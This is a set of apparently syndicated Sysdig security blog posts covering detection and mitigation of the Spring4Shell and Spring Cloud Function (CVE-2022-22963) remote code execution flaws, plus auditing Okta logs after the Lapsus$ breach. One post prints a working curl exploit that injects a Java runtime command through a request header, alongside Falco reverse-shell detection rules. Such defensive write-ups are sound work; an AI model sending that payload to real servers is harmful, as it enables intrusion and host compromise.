After the Spring cloud vulnerability reported yesterday, a new vulnerability called Spring4shell CVE-2022-22965 was reported on the very popular Java framework Spring Core on JDK9+.

The vulnerability is always a remote code execution (RCE) which would permit attackers to execute arbitrary code on the machine and compromise the entire host.

The affected versions are the following:

5.3.0 to 5.3.17
5.2.0 to 5.2.19
Older, unsupported versions

In this article, you’ll understand and clarify the difference between the two vulnerabilities, CVE-2022-22963 and CVE-2022-22965 or Spring4Shell, see how to exploit it and mitigate the new vulnerability using Sysdig.

What is going on with Spring

You may have seen a lot of hype during the last 48 hours regarding Spring and Spring Framework. Make some clarifications on what is going on. It’s needed to be sure to understand and mitigate the right risks and vulnerabilities.

What happened with Spring cloud – CVE-2022-22963

As we reported yesterday, the new CVE-2022-22963is specifically hitting Spring Cloud, permitting the execution of arbitrary code on the host or container.

The vulnerability can also impact serverless functions, like AWS Lambda or Google Cloud Functions, since the framework allows developers to write cloud-agnostic functions using Spring features.

What is CVE-2022-22965 aka Spring4shell?

A new vulnerability was found in Spring Core on JDK9+ allowing a remote code execution, like what previously happened on log4j and Spring cloud. This vulnerability is referenced as Spring4shell.

The Spring Framework is a famous open-source framework used to easily build Java applications. One of the main components is Spring Core, which is among the fundamental parts of the framework. The vulnerability takes advantage of an issue in this part to execute arbitrary code on the host or container.

In this case, using certain configurations, it’s possible for an attacker to send a sequence of crafted HTTP requests to exploit the vulnerability.

It’s important to highlight that Spring4shell and CVE-2022-22963 are two different vulnerabilities affecting two different components.

The CVE-2022-22965 Spring4shell issue

Updated: The Spring4Shell is a critical vulnerability that exploits class injection leading to a complete RCE.

In particular, the vulnerability affects functions that use RequestMapping annotation and POJO (Plain Old Java Object) parameters. RequestMapping uses setter and getters for id to set and get values for specific parameters.

Thus, compiling the project and hosting it on Tomcat is possible with a specific curl command sequence that can modify Tomcat logging properties. Consequently, it is possible to upload a webshell in the Tomcat root directory.

Once uploaded, the webshell can allow attackers to run arbitrary commands on the impacted machine. For more information, look at the PoC here: https://github.com/craig/SpringCore0day.

In order to exploit the vulnerabilities, the following requirements must be met:

JDK 9 or higher
Apache Tomcat as the Servlet container
Packaged as WAR
spring-webmvc or spring-webflux dependency

The impact of CVE-2022-22965 Spring4shell

According to the CVSSv3 system, it scores as CRITICAL severity.

Looking at the potential impacts of this type of vulnerability, it has high impacts on confidentiality, integrity, and availability, as well as the ease of exploitation, which is critical for all the users adopting this solution.

To learn more about how a vulnerability score is calculated, Are Vulnerability Scores Tricking You? Understanding the severity of CVSS and using them effectively

However, there are some requirements that need to be met in order to successfully exploit the vulnerability as we have seen before.

Exploiting the vulnerability is possible to achieve the total compromise of the host or container executing arbitrary commands.

How to detect and mitigate CVE-2022-22965

If you’re impacted by CVE-2022-22965, you should update the application to the versions:

5.3.18+
5.2.20+

As we have seen for the previous CVE-2022-22963, we can detect this vulnerability at three different phases of the application lifecycle:

Build process: With an image scanner.
Deployment process: Thanks to an image scanner on the admission controller.
Runtime detection phase using a runtime detection engine: Detect malicious behaviors in already deployed hosts or pods with Falco.

Let’s now dig deeper into each of them.

Using Sysdig scanning, it’s possible to detect the vulnerable package.

Implementing image scanning on the admission controller, it is possible to admit only the workload images that are compliant with the scanning policy to run in the cluster.

Creating and assigning a policy for this specific CVE-2022-22965, the admission controller will evaluate new deployment images, blocking deployment if this security issue is detected.

To detect at runtime with Falco, here is a reverse shell rule example. To avoid false positives, you can add exceptions in the condition to better adapt to your environment.

- rule: Reverse shell
  desc: Detect reverse shell established remote connection
  condition: evt.type=dup and container and fd.num in (0, 1, 2) and fd.type in ("ipv4", "ipv6")
  output: >
    Reverse shell connection (user=%user.name %container.info process=%proc.name parent=%proc.pname cmdline=%proc.cmdline terminal=%proc.tty container_id=%container.id image=%container.image.repository fd.name=%fd.name fd.num=%fd.num fd.type=%fd.type fd.sip=%fd.sip)
  priority: WARNING
  tags: [container, shell, mitre_execution]
  append: false

Conclusion

This week is another reminder of how easily we can be vulnerable at all times, like what happened with Log4j. In this case, Java is affected; more specifically:

CVE-2022-22963: Spring Cloud Function
CVE-2022-22965: Spring Framework

To be safe, use scanners to find out if you are affected and patch with the latest version to mitigate vulnerabilities. Similarly, use the necessary measures to check that everything is correct in the deployment and never stop monitoring your infrastructure or applications at runtime.

We will keep the blog updated in case of significant changes.

The post Critical Vulnerability in Spring Core: CVE-2022-22965 a.k.a. Spring4Shell appeared first on Sysdig.

Detecting and Mitigating CVE-2022-22963: Spring Cloud RCE Vulnerability

Stefano Chierici — Thu, 31 Mar 2022 02:02:21 +0000

Today, researchers found a new HIGH vulnerability on the famous Spring Cloud Function leading to remote code execution (RCE). The vulnerability CVE-2022-22963 would permit attackers to execute arbitrary code on the machine and compromise the entire host.

After CVE 2022-22963, the new CVE 2022-22965 has been published. The new critical vulnerability affects Spring Framework and also allows remote code execution.
This article has been updated on 2022-04-02.

The Spring Cloud Function versions impacted are the following:

3.1.6
3.2.2
Older, unsupported versions

Using routing functionality, it is possible for a user to provide a specially crafted Spring Expression Language (SpEL) as a routing-expression to access local resources and execute commands in the host.

Since Spring Cloud Function can be used in Cloud serverless functions, like AWS Lambda or Google Cloud Functions, those functions might be impacted as well.

This is the second very high vulnerability discovered in the last few months after the Log4jshell remote code execution vulnerability was found in the Log4j Java library.

In this article, you’ll understand the CVE-2022-22963, and how to exploit and mitigate the vulnerability using Sysdig.

Editor’s note: There are multiple vulnerabilities in Spring, both of which are being labeled Spring4Shell. The following discussion regards the vulnerability affecting Spring Cloud Function which permits Spring Expression Language injection, not the vulnerability in Spring Core.

What is Spring Cloud Function

Spring is an open source lightweight Java platform application development framework used by millions of developers using Spring Framework to create high-performing, easily testable code.

In particular, for this vulnerability, we are going to see the Spring Cloud Function framework. The Spring Cloud Function framework allows developers to write cloud-agnostic functions using Spring features. These functions can be stand-alone classes and one can easily deploy them on any cloud platform to build a serverless framework.

The major advantage of Spring Cloud Function is that it provides all the features of Spring Boot-like autoconfiguration and dependency injection.

Let’s now see where the issue is around the vulnerability CVE-2022-22963.

The CVE-2022-22963 issue

The issue with CVE-2022-22963 is that it permits using HTTP request header spring.cloud.function.routing-expression parameter and SpEL expression to be injected and executed through StandardEvaluationContext.

As we can see from the patch, a new flag isViaHeader was added to perform the validation before parsing the header content. This suggests that the vulnerability is limited to an HTTP attack path.

We also notice how it worked before where the value was used prior to any validation.

The impact of CVE-2022-22963

According to the CVSS system, it scores 9.8 as HIGH severity.

To learn more about how a vulnerability score is calculated, Are Vulnerability Scores Tricking You? Understanding the severity of CVSS and using them effectively

The high impacts on confidentiality, integrity, and availability, as well as the ease of exploitation, make this really critical for all users adopting this solution.

Exploiting the vulnerability is possible to achieve the total compromise of the host or container executing arbitrary commands.

Since Spring Cloud Function might be used in Cloud serverless functions, those functions might be vulnerable in the same way, leading the attackers inside your cloud account.

How to exploit CVE-2022-22963

Exploiting the vulnerability is quite easy to accomplish. In our GitHub, you can find the images to run and try the exploitation. Here is the reported curl command to exploit the vulnerability.

curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'

With this curl, it’s trivial to create a file on the operating system but it could be used to open a reverse shell on the vulnerable host or container.

How to detect and mitigate CVE-2022-22963

If you’re impacted by CVE-2022-22963, you should update the application to the newest versions 3.1.7 & 3.2.3.

Even though you might have already upgraded your library or applied one of the other mitigations on containers affected by the vulnerability, you need to detect any exploitation attempts and post-breach activities in your environment.

You can detect this vulnerability at three different phases of the application lifecycle:

Build process: With an image scanner.
Deployment process: Thanks to an image scanner on the admission controller.
Runtime detection phase using a runtime detection engine: Detect malicious behaviors in already deployed hosts or pods.

Let’s now dig deeper into each of them.

1. Build: Image Scanner

Using an image scanner, a software composition analysis (SCA) tool, you can analyze the contents and the build process of a container image in order to detect security issues, vulnerabilities, or bad practices.

In the report results, you can search if the specific CVE has been detected in any images already deployed in your environment.

We can see that CVE-2022-22963 affects one specific image which uses a vulnerable version.

At the time of the writing of this article, multiple vulnerability-tracking databases were not yet updated to reflect the severity of this vulnerability. As a stopgap solution, pictured below, you can also blacklist vulnerable versions of affected packages. Pictured is a “warn” policy, which will not stop the execution of a vulnerable image.

2. Deploy: Image scanner on admission controller

Implementing image scanning on the admission controller, it is possible to admit only the workload images that are compliant with the scanning policy to run in the cluster.

This component is able to reject images based on names, tags, namespaces, CVE severity level, and so on, using different criteria.

Creating and assigning a policy for this specific CVE-2022-22963, the admission controller will evaluate new deployment images, blocking deployment if this security issue is detected.

Again, in the event of an incomplete vulnerability feed, you can block images containing specific package names and versions.

3. Runtime Response: Event Detection

Using a Runtime detection engine tool like Falco, you can detect attacks that occur in runtime when your containers are already in production.

Here is a reverse shell rule example. To avoid false positives, you can add exceptions in the condition to better adapt to your environment.

- rule: Reverse shell
  desc: Detect reverse shell established remote connection
  condition: evt.type=dup and container and fd.num in (0, 1, 2) and fd.type in ("ipv4", "ipv6")
  output: >
    Reverse shell connection (user=%user.name %container.info process=%proc.name parent=%proc.pname cmdline=%proc.cmdline terminal=%proc.tty container_id=%container.id image=%container.image.repository fd.name=%fd.name fd.num=%fd.num fd.type=%fd.type fd.sip=%fd.sip)
  priority: WARNING
  tags: [container, shell, mitre_execution]
  append: false

Conclusion

Spring Cloud Function vulnerability is another in a series of major Java vulnerabilities. Much like Log4j, it only requires an attacker to be able to send the malicious string to the Java app’s HTTP service. CVE-2022-22963 has a very low bar for exploitation, so we should expect to see attackers heavily scanning the internet. Once found, they will likely install crypto miners, botnets agents or their remote access toolkits.

The best defense for this type of vulnerability is to patch it as soon as possible. Having a clear understanding of the packages being used in your environment is a must in today’s world. Using modern tools, such as SCA, can help accomplish this goal and prioritize systems appropriately.

The post Detecting and Mitigating CVE-2022-22963: Spring Cloud RCE Vulnerability appeared first on Sysdig.

Detect malicious activity in Okta logs with Falco and Sysdig okta-analyzer

Stefano Chierici — Fri, 25 Mar 2022 18:13:47 +0000

On March 22, the hacking group Lapsus$ published a Twitter post with a number of screenshots taken from a computer showing “superuser/admin” access to various systems at authentication firm Okta that took place in January this year.

Okta is the #1 platform in Identity-as-a-Service (IDaaS) category, which means that it manages access to internal and external systems with one login.

Thousands of organizations and governments worldwide use Okta as the gatekeeper to their SaaS environment and cloud services. This episode demonstrates the importance of insider attacks, and others like phishing, credential stuffing, password spray; to which we can all potentially fall victim or be affected by a ramification in another compromise.

In this article, we are going to see how it’s possible to analyze and audit current and past logs using Falco and Sysdig okta-analyzer.

Who is DEV-0537 aka lapsus$ group?

Apart from the last breach hack, we don’t know much about the threat actor DEV-0537 aka Lapsus$ group. What we know is that it’s a very recent group operating out of South America and it has been active since at least December 2021 and claiming a number of victims in recent months.

Their main targets are usually large organizations to steal data and extort payments. The main victims go from government institutions like the Brazilian Ministry of Health and various technology and gaming companies like Microsoft, Nvidia, Ubisoft, Samsung, and Okta is to add to this list.

Not much else is known about Lapsus$ itself, other than that unlike ransomware gangs, which use dark web websites to publish stolen data, Lapsus$ uses a Telegram channel to share information about its attacks – and information stolen from its victims – directly with anyone who is subscribed to it.

Okta data breach – What happened?

The hacker group Lapsus$ posted on its Telegram channel the following message, which shows screenshots of access to okta.com with Superadmin access. Checking the reported date on the screen it seems that the breach occurred at the end of January 2022, leaving many concerns.

After some investigations conducted by Okta, Okta’s CEO Todd McKinnon confirmed an event in January in their official statement.

In addition to the official statement, OKTA published a timeline of the incidents which took place from January 16 to January 21 when the threat actor had access to the Sitel environment.

Using the Telegram channel, the hacker group denies the official investigation statement published by Okta leaving many to wonder why Okta didn’t report the breach earlier and the real impacts and customers involved.

Understanding the impact of the Okta breach

Estimating the real impacts of this breach is pretty hard and customers may want to conduct their own analysis.

Based on what Okta stated and reported before, the maximum potential impact of the breach is 366, approximately 2.5% of customers whose Okta tenant was accessed by Sitel. Affected customers will receive a report that shows the actions performed on their Okta tenant by Sitel during the specific period of time, so they can perform their own investigations.

On the other hand, Lapsus$ responded using the Telegram channel stating that the potential impact to Okta customers is NOT limited and resetting passwords and MFA would result in total account compromise.

What is sure is that checking Okta logs for the past months and making sure there aren’t any suspicious logs might be a short activity that could save Okta customers from unpleasant surprises in the future.

In this article, we are going to have a look at who can audit the Okta logs easily without needing to ingest all the logs in a single system.

Don’t panic, what can we do now

If you are an Okta customer you may be wondering what we can do to assess what happened and if something malicious is still happening in our environment.

Based on the information shared by Okta there are some events we should monitor and assess in past logs to make sure nothing happened and nothing is happening. In particular, we suggest the following actions:

Enable MFA for all the users. As we know just passwords aren’t enough to secure our account and we must need an additional level of protection.
Investigate the following events:
- Check all password and MFA changes in our Okta instances.
- Make sure that all the password resets are valid.

It’s fundamental to check either past logs and current logs to be sure your environment is still safe and there aren’t suspicious activities. If any of these events trigger an alert, take action on those accounts and we recommend that you initiate a deep investigation.

Sysdig can help you on analyzing and audit current logs using Falco open source and past logs using Sysdig okta-analyzer, providing a solution for both cases.

Runtime detection with Falco

To address this new Okta challenge we need a smart and ready to use tool which is capable of consuming a huge amount of Okta logs to assess if something fishy is happening in our environment.

Falco has a great reputation as a tool for runtime security in Linux, Container, and Kubernetes environments. What we might not know yet is that Falco has recently extended its detection capabilities with the new Falco plugin framework, which allows us to create plugins for different data sources and use the usual Falco engine over those logs.

In response to this incident, the Falco Team has created a new plugin for Okta with which it’s possible to use Falco detection rules and get alerts over those suspicious events. Here is a quick example of how a Falco rule would detect and report MFA being removed from a user account.

- rule: removing MFA factor from user in OKTA
 desc: Detect a removing MFA activity on a user in OKTA
 condition: okta.evt.type = "user.mfa.factor.deactivate"
 output: "A user has removed MFA factor in the OKTA account (user=%okta.actor.name, ip=%okta.client.ip)"
 priority: NOTICE
 source: okta
 tags: [okta]

A lot of other rules are available ready to be used and created by the Sysdig Threat Research team to audit different types of security events. If you want to learn more about the Okta plugin, visit the new blog Analyze Okta Log Events with a Falco Plugin.

Sysdig okta-analyzer: Okta threat detection

Once we have the runtime detection part covered, we will want to quickly find out if we have been affected in the past by the Lapsus$ group.

Sysdig has released the following binaries that will allow us to collect Okta events from the date we choose. It should be noted that the data collection time will vary depending on the size of the company and the distance from the initial date from which we will start ingesting the data.

Name	sha256
okta-analyzer-darwin-amd64	52e43994b12d790ce2a784f73a68984b8a554384962936eb8cbab5f551af396b
okta-analyzer-darwin-arm64	1a5957248dc4b665a9be7334d76a8cd0871a2da7aa86affd668512a5f547d2f2
okta-analyzer-linux-amd64	105e97b9bdc2cf6e5cb231bc0134548647a25d63c5a84a710718275d1392662b

How to use okta-analyzer

To run the okta-analyzer, follow the simple instructions. The only thing we need is the Okta token, here you can find the process to obtain it.

Usage:
  okta-analyzer [OPTIONS]
Application Options:
  -f, --file=   Okta Logs File
      --apikey= Okta API Key
      --url=    Okta API base url (e.g. "https://mycompany.okta.com")
Help Options:
  -h, --help    Show this help message

It can used either with:

okta-analyzer -f

or with:

okta-analyzer --apikey $OKTA_API_KEY --url yourcompany.okta.com

Reporting to a post-analysis

Once the tool is run, Okta logs are ingested and processed by the Falco OOTB rules to detect suspicious events and generated a PDF with all the evidence to a deep-analysis. This provides a quick overview of how much you may be affected.

Conclusion

No one is safe from being a target, and it is necessary to be aware that any software or service we use must be audited to shorten detection times. In addition, this incident has highlighted the importance of taking measures against an insider or social engineering, which in the end is the weakest point in the chain.

Delegating part of your infrastructure might be crucial for your business. Actively keeping an eye on its behavior is too. We hope this threat is seen as a warning of the potential risk.

If you are concerned about this new threat, audit your Okta logs as soon as possible to detect if you are affected. In this article, we have offered you the steps to follow to make the process easier.

The post Detect malicious activity in Okta logs with Falco and Sysdig okta-analyzer appeared first on Sysdig.